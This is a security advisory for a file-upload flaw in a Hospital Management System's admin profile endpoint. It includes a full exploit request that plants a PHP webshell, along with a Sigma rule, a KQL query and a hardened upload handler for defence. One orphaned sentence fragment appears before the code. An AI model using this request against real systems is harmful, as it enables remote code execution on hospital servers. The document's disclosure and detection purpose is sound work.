I observed a critical security flaw in the Hospital Management System (HMS) developed by rickxy. This vulnerability, tracked as CVE-2026-6602, allows an unauthenticated attacker to perform an arbitrary file upload (AFU) to achieve remote code execution (RCE).
The flaw is located in /backend/admin/his_admin_account.php. The application lacks proper session validation and fails to restrict file types, allowing attackers to upload malicious scripts via the ad_dpic parameter.
Technical Analysis
The application blindly trusts the client-supplied Content-Type header and never validates the file extension. Because the endpoint also performs no session validation, a crafted multipart/form-data request from an unauthenticated client is processed as if it came from a logged-in administrator, bypassing all intended access controls.
Analysis indicates that the following request achieves code execution:
POST /backend/admin/his_admin_account.php HTTP/1.1
Content-Type: multipart/form-data; boundary=aaa

--aaa
Content-Disposition: form-data; name="update_profile"

1
--aaa
Content-Disposition: form-data; name="ad_dpic"; filename="shell.php"
Content-Type: application/x-php

<?php system($_GET['cmd']); ?>
--aaa--

The resulting webshell is accessible at /backend/admin/assets/images/users/shell.php.
During an incident response engagement involving this CVE, look for:
- Requests to /backend/admin/his_admin_account.php.
- Files in /backend/admin/assets/images/users/ with .php or .phtml extensions.

Sigma rule:

title: Potential Unrestricted File Upload in Hospital Management System
status: experimental
description: Detects exploitation of CVE-2026-6602.
logsource:
    category: web_server
detection:
    selection_post:
        method: POST
        url|endswith: '/backend/admin/his_admin_account.php'
    selection_get:
        method: GET
        url|contains: '/backend/admin/assets/images/users/'
        url|endswith: '.php'
    condition: selection_post or selection_get
level: critical

Note that legitimate administrator profile updates also POST to his_admin_account.php, so selection_post hits need triage; a GET for a .php file under the upload directory, especially from the same client shortly after the POST, is the stronger signal.

KQL query:

let vulnerable_endpoint = "/backend/admin/his_admin_account.php";
let upload_directory = "/backend/admin/assets/images/users/";
WebAccessLogs
| where (HttpVerb == "POST" and Url has vulnerable_endpoint)
    or (HttpVerb == "GET" and Url has upload_directory and Url matches regex @"\.(php|phtml|php5)$")
| summarize count() by ClientIp, Url, HttpVerb, bin(TimeGenerated, 5m)

finfo_file or getimagesize.
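As an added example, not the HMS project's own code, here is a hardened replacement for the ad_dpic profile-picture handler that applies the session check the advisory says is missing and the finfo_file/getimagesize content validation it points to. It assumes the admin session is stored in $_SESSION['admin_id'] and that images live under assets/images/users/ relative to the script.

```php
<?php
// Added example (not the HMS project's code): hardened handling of the
// ad_dpic upload. Assumptions: the admin session key is $_SESSION['admin_id']
// and profile images are stored under assets/images/users/.
session_start();

function reject(int $status, string $msg): void {
    http_response_code($status);
    exit($msg);
}

// 1. Session validation: the vulnerable handler accepted unauthenticated requests.
if (empty($_SESSION['admin_id'])) {
    reject(401, 'Login required');
}

if (!isset($_POST['update_profile'], $_FILES['ad_dpic'])) {
    reject(400, 'Missing form fields');
}
$f = $_FILES['ad_dpic'];
if ($f['error'] !== UPLOAD_ERR_OK || !is_uploaded_file($f['tmp_name'])) {
    reject(400, 'Upload failed');
}
if ($f['size'] > 2 * 1024 * 1024) {
    reject(413, 'Image too large');
}

// 2. Never trust the client's Content-Type or filename: sniff the actual bytes
//    with finfo and require getimagesize to agree on the image type.
$allowed = ['image/jpeg' => 'jpg', 'image/png' => 'png', 'image/gif' => 'gif'];
$mime = (new finfo(FILEINFO_MIME_TYPE))->file($f['tmp_name']);
$info = @getimagesize($f['tmp_name']);
if (!isset($allowed[$mime]) || $info === false || $info['mime'] !== $mime) {
    reject(415, 'Only JPEG, PNG or GIF images are accepted');
}

// 3. Server-chosen name and extension; the user-supplied filename is discarded,
//    so a "shell.php" upload can never land in the web root under that name.
$dir = __DIR__ . '/assets/images/users/';
$name = bin2hex(random_bytes(16)) . '.' . $allowed[$mime];
if (!move_uploaded_file($f['tmp_name'], $dir . $name)) {
    reject(500, 'Could not store image');
}
// Persist $name against $_SESSION['admin_id'] in the database here (omitted).
echo 'Profile picture updated';
```

As defence in depth, also disable script execution for the upload directory in the web-server configuration, since a valid image can still carry embedded PHP.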